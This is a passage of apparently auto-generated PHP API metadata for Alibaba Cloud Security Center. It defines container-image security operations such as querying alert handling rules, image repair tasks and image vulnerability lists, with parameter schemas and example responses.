['title' => '', 'description' => 'The alerting type. Valid values:'."\n" .'- **sensitiveFile**: sensitive file.', 'type' => 'string', 'example' => 'sensitiveFile'], 'Operations' => [ 'title' => '', 'description' => 'The list of operations.', 'type' => 'array', 'items' => [ 'description' => 'The list of operations.', 'type' => 'object', 'properties' => [ 'OperationCode' => ['title' => '', 'description' => 'The operation code. Valid values:'."\n" .'- **whitelist**: whitelist.', 'type' => 'string', 'example' => 'whitelist'], 'OperationName' => ['title' => '', 'description' => 'The operation name.', 'type' => 'string', 'example' => 'whitelist'], 'Conditions' => [ 'title' => '', 'description' => 'The rule conditions.', 'type' => 'array', 'items' => [ 'description' => 'The rule conditions.', 'type' => 'object', 'properties' => [ 'ConditionKey' => ['title' => '', 'description' => 'The condition key. Valid values:'."\n" .'- **MD5**: MD5.'."\n" .'- **PATH**: path.', 'type' => 'string', 'example' => 'MD5'], 'ConditionName' => ['title' => '', 'description' => 'The condition name.', 'type' => 'string', 'example' => 'MD5'], 'SupportedMisType' => [ 'title' => '', 'description' => 'The match type.', 'type' => 'array', 'items' => ['description' => 'The match type. Valid values:'."\n" .'- **contains**: contains.'."\n" .'- **equals**: equals.'."\n" .'- **startWith**: prefix.'."\n" .'- **endWith**: suffix.', 'type' => 'string', 'example' => 'contains', 'title' => ''], 'example' => '', ], ], 'title' => '', 'example' => '', ], 'example' => '', ], ], 'title' => '', 'example' => '', ], 'example' => '', ], 'Scenarios' => [ 'title' => '', 'description' => 'The rule scope.', 'type' => 'array', 'items' => ['description' => 'The rule scope. The value is in JSON format. Valid keys:'."\n" .'- **type**: the scope type.'."\n" .'- **value**: the scope value.', 'type' => 'string', 'example' => '{\\"type\\": \\"repo\\", \\"value\\": \\"test-aaa/shenzhen-repo-01\\"}', 'title' => ''], 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The return code of the call.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'ADE57832-9666-511C-9A80-B87DE2E8****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query conditions for handling image events', 'summary' => 'Queries the conditions for handling image events.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageEventOperationCondition'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageEvenOperationCondition', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"EventType\\": \\"sensitiveFile\\",\\n \\"Operations\\": [\\n {\\n \\"OperationCode\\": \\"whitelist\\",\\n \\"OperationName\\": \\"whitelist\\",\\n \\"Conditions\\": [\\n {\\n \\"ConditionKey\\": \\"MD5\\",\\n \\"ConditionName\\": \\"MD5\\",\\n \\"SupportedMisType\\": [\\n \\"contains\\"\\n ]\\n }\\n ]\\n }\\n ],\\n \\"Scenarios\\": [\\n \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"repo\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"test-aaa/shenzhen-repo-01\\\\\\\\\\\\\\"}\\"\\n ]\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"ADE57832-9666-511C-9A80-B87DE2E8****\\"\\n}","type":"json"}]', ], 'DescribeImageEventOperationPage' => [ 'summary' => 'Queries alerting handling rules by using paging.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '195585', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the alert handling rule.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '49616'], ], [ 'name' => 'EventType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The alerting type. Valid values:'."\n" .'- **sensitiveFile**: sensitive file tampering.', 'type' => 'string', 'required' => false, 'example' => 'sensitiveFile'], ], [ 'name' => 'EventKey', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The keyword of the alert metric.', 'type' => 'string', 'required' => false, 'example' => 'PEM'], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the alert metric.', 'type' => 'string', 'required' => false, 'example' => 'PEM'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the alert handling rule. Valid values:'."\n" .'- **default**: image'."\n" .'- **agentless**: agentless detection.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of alert handling rules.', 'type' => 'array', 'items' => [ 'description' => 'The alert handling rule.', 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The primary key of the alert handling rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '2646624'], 'EventType' => ['title' => '', 'description' => 'The alerting type. Valid values:'."\n" .'- **sensitiveFile**: sensitive file tampering.', 'type' => 'string', 'example' => 'sensitiveFile'], 'OperationCode' => ['title' => '', 'description' => 'The operation code. Valid values:'."\n" .'- **whitelist**: whitelist.', 'type' => 'string', 'example' => 'whitelist'], 'Conditions' => ['title' => '', 'description' => 'The rule conditions in JSON format. Valid keys:'."\n" .'- **condition**: the matching condition.'."\n" .'- **type**: the matching type.'."\n" .'- **value**: the matching value.', 'type' => 'string', 'example' => '[{\\"condition\\": \\"MD5\\", \\"type\\": \\"equals\\", \\"value\\": \\"0083a31cc0083a31ccf7c10367a6e783e\\"}]'."\n"], 'Scenarios' => ['title' => '', 'description' => 'The rule scope in JSON format. Valid keys:'."\n" .'- **type**: the scope type.'."\n" .'- **value**: the scope value.', 'type' => 'string', 'example' => '{\\"type\\": \\"repo\\", \\"value\\": \\"test-aaa/shenzhen-repo-01\\"}'."\n"], 'EventKey' => ['title' => '', 'description' => 'The keyword of the alert metric.', 'type' => 'string', 'example' => 'PEM'], 'EventName' => ['title' => '', 'description' => 'The name of the alert metric.', 'type' => 'string', 'example' => 'PEM'], 'Note' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'xxx', 'title' => ''], 'Source' => ['description' => 'The source of the alert handling rule. Valid values:'."\n" .'- **default**: image'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'example' => 'default', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paged query parameters.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The number of the page to return in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries to return on each page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '109', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the API call was successful. Valid values:'."\n" ."\n" .'- **true**: The API call was successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'A3D7C47D-3F11-57BB-90E8-E5C20C61****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query alerting handling rules by paging', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageEventOperationPage'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageEventOperationPage', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ImageEventOperation', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:imageeventoperation/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"List\\": [\\n {\\n \\"Id\\": 2646624,\\n \\"EventType\\": \\"sensitiveFile\\",\\n \\"OperationCode\\": \\"whitelist\\",\\n \\"Conditions\\": \\"[{\\\\\\\\\\\\\\"condition\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"MD5\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"equals\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"0083a31cc0083a31ccf7c10367a6e783e\\\\\\\\\\\\\\"}]\\\\n\\",\\n \\"Scenarios\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"repo\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"test-aaa/shenzhen-repo-01\\\\\\\\\\\\\\"}\\\\n\\",\\n \\"EventKey\\": \\"PEM\\",\\n \\"EventName\\": \\"PEM\\",\\n \\"Note\\": \\"xxx\\",\\n \\"Source\\": \\"default\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 109\\n }\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C61****\\"\\n}","type":"json"}]', ], 'DescribeImageFixCycleConfig' => [ 'summary' => 'Queries the scheduled image fix configuration.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'ImageFixSwitch' => ['description' => 'The scheduled image fix switch. Valid values:'."\n" ."\n" .'- **on**: Enabled.'."\n" .'- **off**: Disabled.', 'type' => 'string', 'example' => 'on', 'title' => ''], 'ImageFixCycle' => ['description' => 'The scheduled fix cycle. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'ImageFixTarget' => ['description' => 'The scope of the scheduled image fix. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **type**: The target type. The value is fixed as repo.'."\n" .'- **target**: The target content. Format: namespace/image repository.', 'type' => 'string', 'example' => '{\\"type\\":\\"repo\\",\\"target\\":[\\"qa-dac/yyuan9\\",\\"cdp-uat/zentao\\",\\"cafdms-qa/xxl-job-admin\\",\\"cafdms-qa/utils/jdk\\",\\"cafmfbi/ui\\",\\"cdp-uat/tradingdesk-webapp\\"]}', 'title' => ''], 'ImageTimeRange' => ['description' => 'The time range during which the image was modified. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'D65AADFC-1D20-5A6A-8F6A-9FA53C0D****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query scheduled image fix configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageFixCycleConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageFixCycleConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"ImageFixSwitch\\": \\"on\\",\\n \\"ImageFixCycle\\": 7,\\n \\"ImageFixTarget\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"repo\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"target\\\\\\\\\\\\\\":[\\\\\\\\\\\\\\"qa-dac/yyuan9\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"cdp-uat/zentao\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"cafdms-qa/xxl-job-admin\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"cafdms-qa/utils/jdk\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"cafmfbi/ui\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"cdp-uat/tradingdesk-webapp\\\\\\\\\\\\\\"]}\\",\\n \\"ImageTimeRange\\": 30\\n },\\n \\"RequestId\\": \\"D65AADFC-1D20-5A6A-8F6A-9FA53C0D****\\"\\n}","type":"json"}]', ], 'DescribeImageFixTask' => [ 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start timestamp of the repair task that you want to query. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1634725571000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end timestamp of the repair task that you want to query. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1635575219000', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the image repair task that you want to query. Valid values:'."\n" ."\n" .'- **1**: Repairing'."\n" .'- **2**: Repaired'."\n" .'- **3**: Repair failed', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the results to return. Default value: **1**, which indicates that the results start from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paginated query. Default value: **20**, which indicates that up to 20 entries are returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '8AC52BBA-85D3-5F64-9B48-D08437CAF916'], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the results returned. Default value: **1**, which indicates that the results start from page 1.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in a paginated query. Default value: **20**, which indicates that up to 20 entries are returned per page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of image repair tasks.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], 'Count' => ['description' => 'The number of image repair tasks on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '12', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BuildTasks' => [ 'description' => 'The details of the image repair tasks.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'BuildTaskId' => ['description' => 'The ID of the image repair task.', 'type' => 'string', 'example' => 'ivf-939536b5-c3ca-427b-8183-91007756', 'title' => ''], 'TaskType' => ['description' => 'The type of the image repair task. The value is fixed as IMAGE_REPAIR, which indicates image repair.', 'type' => 'string', 'example' => 'IMAGE_REPAIR', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the image.', 'type' => 'string', 'example' => 'name-002', 'title' => ''], 'RepoName' => ['description' => 'The name of the image repository.', 'type' => 'string', 'example' => 'test-redhat', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the image.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'OldTag' => ['description' => 'The tag of the original image.', 'type' => 'string', 'example' => 'centos8.1-ja', 'title' => ''], 'OldUuid' => ['description' => 'The UUID of the original image.', 'type' => 'string', 'example' => '2fa731681911ae8d1b5f11893ace****', 'title' => ''], 'NewTag' => ['description' => 'The tag of the repaired image.', 'type' => 'string', 'example' => 'redhat8-vault', 'title' => ''], 'NewUuid' => ['description' => 'The UUID of the repaired image.', 'type' => 'string', 'example' => '2fa731681911ae8d1b5f11893ace****', 'title' => ''], 'FixTime' => ['description' => 'The timestamp when the repair task ended. Unit: milliseconds.', 'type' => 'string', 'example' => '2021-10-14 20:32:05', 'title' => ''], 'FinishTime' => ['description' => 'The timestamp when the repair task started. Unit: milliseconds.', 'type' => 'string', 'example' => '2021-10-14 20:34:07', 'title' => ''], 'Status' => ['description' => 'The status of the image repair task. Valid values:'."\n" ."\n" .'- **1**: Repairing'."\n" .'- **2**: Repaired'."\n" .'- **3**: Repair failed', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'VulAlias' => ['description' => 'The name of the vulnerability that was repaired.', 'type' => 'string', 'example' => 'CVE-2007-5686:rpath_linux Information Disclosure', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query the list of created image repair tasks', 'summary' => 'Queries the list of created image repair tasks.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageFixTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageFixTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8AC52BBA-85D3-5F64-9B48-D08437CAF916\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 12,\\n \\"Count\\": 12\\n },\\n \\"BuildTasks\\": [\\n {\\n \\"BuildTaskId\\": \\"ivf-939536b5-c3ca-427b-8183-91007756\\",\\n \\"TaskType\\": \\"IMAGE_REPAIR\\",\\n \\"RepoNamespace\\": \\"name-002\\",\\n \\"RepoName\\": \\"test-redhat\\",\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"OldTag\\": \\"centos8.1-ja\\",\\n \\"OldUuid\\": \\"2fa731681911ae8d1b5f11893ace****\\",\\n \\"NewTag\\": \\"redhat8-vault\\",\\n \\"NewUuid\\": \\"2fa731681911ae8d1b5f11893ace****\\",\\n \\"FixTime\\": \\"2021-10-14 20:32:05\\",\\n \\"FinishTime\\": \\"2021-10-14 20:34:07\\",\\n \\"Status\\": 2,\\n \\"VulAlias\\": \\"CVE-2007-5686:rpath_linux Information Disclosure\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeImageGroupedVulList' => [ 'summary' => 'Queries the list of image vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" .'- **cve**: image system vulnerability'."\n" .'- **sca**: image application vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset group.', 'type' => 'string', 'required' => false, 'example' => '1311', 'title' => ''], ], [ 'name' => 'CveId', 'in' => 'query', 'schema' => ['description' => 'The CVE ID of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'CVE-2017-15420', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The list of unique IDs of asset instances. Separate multiple IDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => 'uuid-13134124****', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'debian:10:CVE-2019-9893', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'High severity vulnerability that affects org.eclipse.jetty:jetty-server', 'title' => ''], ], [ 'name' => 'PatchId', 'in' => 'query', 'schema' => ['description' => 'The ID of the vulnerability patch.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1341512412', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority level for fixing the vulnerability. Valid values:'."\n" .'- **asap**: high-priority vulnerability (typically a high-risk vulnerability)'."\n" .'- **later**: medium-priority vulnerability (typically a medium-risk vulnerability)'."\n" .'- **nntf**: low-priority vulnerability (typically a low-risk vulnerability).', 'type' => 'string', 'required' => false, 'example' => 'asap', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return in the query results. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of image vulnerabilities to display on each page during a paging query. Default value: **20**, which indicates that 20 image vulnerabilities are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'RepoRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'i-qewqrqcsadf****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'qew****', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'ImageTag', 'in' => 'query', 'schema' => ['description' => 'The tag of the image.', 'type' => 'string', 'required' => false, 'example' => 'oval', 'title' => ''], ], [ 'name' => 'ImageDigest', 'in' => 'query', 'schema' => ['description' => 'The SHA256 value of the image digest.', 'type' => 'string', 'required' => false, 'example' => 'w213412341dfsfasdfafadfasfasf', 'title' => ''], ], [ 'name' => 'ImageLayer', 'in' => 'query', 'schema' => ['description' => 'The layer of the image.', 'type' => 'string', 'required' => false, 'example' => 'b1f5b9420803ad0657cf21566e3e20acc08581e7f22991249ef3aa80b8b1c587', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'IsLatest', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to query vulnerabilities of only the latest image. If this parameter is not set, vulnerabilities of all images are queried. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster to query.'."\n" .'> Call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c60b77fe62093480db6164a3c2fa5****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **container**: container'."\n" .'- **image**: image.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleTag', 'in' => 'query', 'schema' => ['description' => 'The vulnerability tag. Valid values:'."\n" ."\n" .' - **AI**: vulnerabilities related to AI components.', 'type' => 'string', 'required' => false, 'example' => 'AI', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '5E244439-UJND-8BF7-26F36E21B9AA', 'title' => ''], 'PageSize' => ['description' => 'The number of image vulnerabilities returned on each page in the paging query. Default value: **20**, which indicates that 20 image vulnerability records are returned on each page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of image system vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '21', 'title' => ''], 'GroupedVulItems' => [ 'description' => 'The list of image vulnerabilities.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The processing status of the vulnerability. Valid values:'."\n" ."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Handled.'."\n" .'- **2**: Verifying.'."\n" .'- **3**: Added to the whitelist.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Type' => ['description' => 'The type of vulnerability to query. Valid values:'."\n" .'- **cve**: image system vulnerability'."\n" .'- **sca**: image application vulnerability.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'NntfCount' => ['description' => 'The number of low-risk vulnerabilities.', 'type' => 'integer', 'format' => 'int32', 'example' => '29', 'title' => ''], 'GmtLast' => ['description' => 'The timestamp of the first scan, in milliseconds.', 'type' => 'integer', 'format' => 